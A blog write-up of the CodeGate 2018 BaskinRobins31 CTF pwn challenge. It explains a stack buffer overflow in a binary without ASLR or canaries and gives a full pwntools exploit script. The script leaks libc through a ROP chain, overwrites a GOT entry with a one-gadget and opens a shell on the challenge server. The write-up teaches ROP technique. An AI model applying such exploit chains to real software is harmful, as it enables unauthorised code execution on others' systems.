pwn

CodeGate 2018 PWN BaskinRobins Write-up

dangokyoLeave a comment

Introduction

Finally come back from Spring Festival vacation. Since I think Readme-revenge is not a typical example on ROP attack. I think I can use the easiest challenge in CodeGate 2018 to demonstrate the usage of ROP attack.

Vulnerability Analysis

ASLR and stack canary is not enabled in the binary. Furthermore, there is an obvious stack buffer overflow in function your_turn.

Exploit Plan

The exploit is divided into two parts: (l)Leak the libc version via constructing ROP chain to read function pointer in GOT. (2)Construct ROP to use read to overwrite function pointer in GOT to magic gadget.

Exploit

from pwn import *

DEBUG = int(sys.argv[1]);

if(DEBUG == 0):
    r = remote("ch41l3ng3s.codegate.kr", 3131);
elif(DEBUG == 1):
    r = process("./BaskinRobins31");
elif(DEBUG == 2):
    r = process("./BaskinRobins31");
    gdb.attach(r, '''source ./script''');

def exploit():
    helper = 0x40087a;
    junk = 0x424242424242;
    payload = "A"*0xb0;

    payload += p64(0x6020b8);
    payload += p64(helper);
    payload += p64(0) + p64(0x6020c0) + p64(0x80) + p64(0x4008f4);
    payload += p64(junk) * 20;

    r.recvuntil("(1-3)");
    r.send(payload);

    time.sleep(2);
    payload2 = p64(helper);
    payload2 += p64(0) + p64(0x602028) + p64(0x8) + p64(0x400bbb);
    payload2 += p64(0x6020c0) + p64(0x414141414141)*4;
    payload2 += p64(0x4008f4);
    r.send(payload2);

    r.recvuntil(":(");
    r.recv(2);

    leakValue1 = u64(r.recv(8));
    leakValue2 = u64(r.recv(8));
    leakValue3 = u64(r.recv(8));
    leakValue4 = u64(r.recv(8));
    leakValue5 = u64(r.recv(8));
    leakValue6 = u64(r.recv(8));
    leakValue7 = u64(r.recv(8));
    leakValue8 = u64(r.recv(8));
    leakValue9 = u64(r.recv(8));

    log.info("0x%x", leakValue6);
    log.info("0x%x", leakValue7);
    log.info("0x%x", leakValue8);
    log.info("0x%x", leakValue9);

    libcBase = leakValue8 - 0xf7250;
    log.info("Libc Base: 0x%x", libcBase);

    oneGadget = libcBase + 0xf1147;
    payload3 = p64(oneGadget);
    r.send(payload3);

    r.interactive();

exploit();

Conclusion

It’s not a difficult but typical ROP challenge. Since Readme-revenge in 34C3 is like a riddle, I take this challenge as an example on ROP attack.

Leave a comment

This site uses Akismet to reduce spam. Learn how your comment data is processed.